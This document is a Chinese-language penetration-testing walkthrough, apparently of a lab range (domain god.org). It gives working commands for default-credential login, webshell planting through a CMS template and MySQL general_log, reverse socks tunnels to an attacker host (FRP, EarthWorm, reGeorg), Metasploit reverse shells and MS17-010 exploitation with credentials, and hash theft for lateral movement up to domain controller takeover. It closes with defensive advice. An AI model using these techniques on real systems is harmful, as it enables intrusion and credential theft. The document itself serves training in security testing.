内网渗透实战教学文档

环境搭建与排错

• 在搭建过程中遇到报错，通过删除部分内容成功解决（具体报错信息未提供）
• 关键点：渗透测试中遇到环境问题时应尝试简化配置或删除非必要组件

信息收集阶段

1. 主机发现

使用Nmap进行存活主机探测：

nmap -sn <目标网段>

2. 端口扫描与服务识别

• 发现80端口开放Web服务
• 访问Web服务发现管理员接口，并存在默认凭据泄露

Web渗透

1. 弱口令利用

• 使用泄露的默认用户名和密码成功登录后台
• 关键点：始终尝试默认凭据和常见弱口令组合

2. 文件上传获取Webshell

1. 在后台编辑模板处新增shell.php文件
2. 文件写入路径：/yxcms/protected/apps/default/view/default/
3. 成功获取Webshell

内网横向移动

1. 内网信息收集

• 进入内网后收集IP信息
• 使用fscan进行内网扫描

2. MySQL提权

发现存在phpMyAdmin未授权访问漏洞：

1. 路径：C:\phpstudy_pro\Extensions\MySQL5.7.26\

2. 利用方法：

   • 检查secure_file_priv值：

     show variables like '%secure_file_priv%';
     

   • 当值为"NULL"时不允许读取任意文件
   • 当值为空时允许读取任意文件

3. 使用MySQL日志文件写入Webshell：

   show variables like "%general%";
   set global general_log = "ON";
   set global general_log_file='C:/phpstudy_pro/www/shell1.php';
   

3. 漏洞扫描

扫描发现：

• MS17-010（永恒之蓝）漏洞
• 域环境机器

代理搭建技术

1. reGeorg代理

python reGeorgSocksProxy.py -p 8080 -u http://upload.sensepost.net:8080/tunnel/tunnel.jsp

2. Neo-reGeorg代理

python neoreg.py -u http://192.168.163.138/www.yxcms6.com/protected/apps/default/view/default/tunnel.php --proxy socks5://10.1.1.1:8888

3. 毒刺(Stinger)Webshell

• Windows端：

  start D:/XXX/stinger_server.exe 0.0.0.0
  

• 客户端(VPS)：

  ./stinger_client -w http://192.168.163.138/www.yxcms6.com/protected/apps/default/view/default/proxy.php -l 127.0.0.1 -p 60000
  

4. FRP内网穿透

服务端配置(frps.ini)：

[common]
bind_port = 57000
token = 123qwe
heartbeat_timeout = 90
max_pool_count = 5

客户端配置(frpc.ini)：

[common]
server_addr = 1.1.1.1
server_port = 57000
token = 123qwe
pool_count = 5
protocol = tcp
health_check_type = tcp
health_check_interval_s = 100

[socks_test]
remote_port = 10000
plugin = socks5
plugin_user = admin
plugin_passwd = password
use_encryption = true
use_compression = true

MSF框架利用

1. 监听设置

msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.239.198
set lport 6666
run

2. 永恒之蓝(MS17-010)利用

use exploit/windows/smb/ms17_010_psexec
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.239.198
set LPORT 4444
set RHOST 192.168.52.141
set SMBUser weizi
set SMBPass HONGRISEC@2019
run

3. 代理设置

Kali端：

./ew_for_linux64 -s rcsocks -l 1080 -e 9999

目标机器：

ew_for_Win.exe -s rssocks -d 192.168.163.128 -e 9999

Cobalt Strike操作

1. MSF会话转CS

• 将MSF获取的会话转移到Cobalt Strike

2. 信息收集

• 发现域内管理员账号
• 查看PC信息和进程
• 确认域名为god.org
• 定位域控

3. 权限提升

• 使用CS功能进行提权
• 成功获取管理员权限

4. Hash抓取

• 抓取管理员账号和密码的Hash
• 进行横向传递

域渗透

1. 成功获取AD和另一台域内主机
2. 使用MSF获取shell后设置socks代理
3. 通过代理进行信息收集，发现其他主机
4. RDP代理连接
5. 成功获取另一台域内主机
6. 继续利用永恒之蓝漏洞
7. 执行横向移动命令
8. 通过RDP登录Windows Server 2012
9. 最终获取域控(AD)权限

关键工具总结

1. 扫描工具：Nmap、fscan
2. 代理工具：reGeorg、Neo-reGeorg、毒刺Webshell、FRP、EarthWorm(EW)
3. 渗透框架：Metasploit Framework(MSF)、Cobalt Strike(CS)
4. 漏洞利用：MS17-010(永恒之蓝)、phpMyAdmin未授权访问
5. Webshell管理：哥斯拉

防御建议

1. 禁用默认凭据和弱口令
2. 及时修补已知漏洞如MS17-010
3. 限制MySQL的secure_file_priv权限
4. 监控异常日志文件修改
5. 限制内网横向移动能力
6. 部署网络分段和访问控制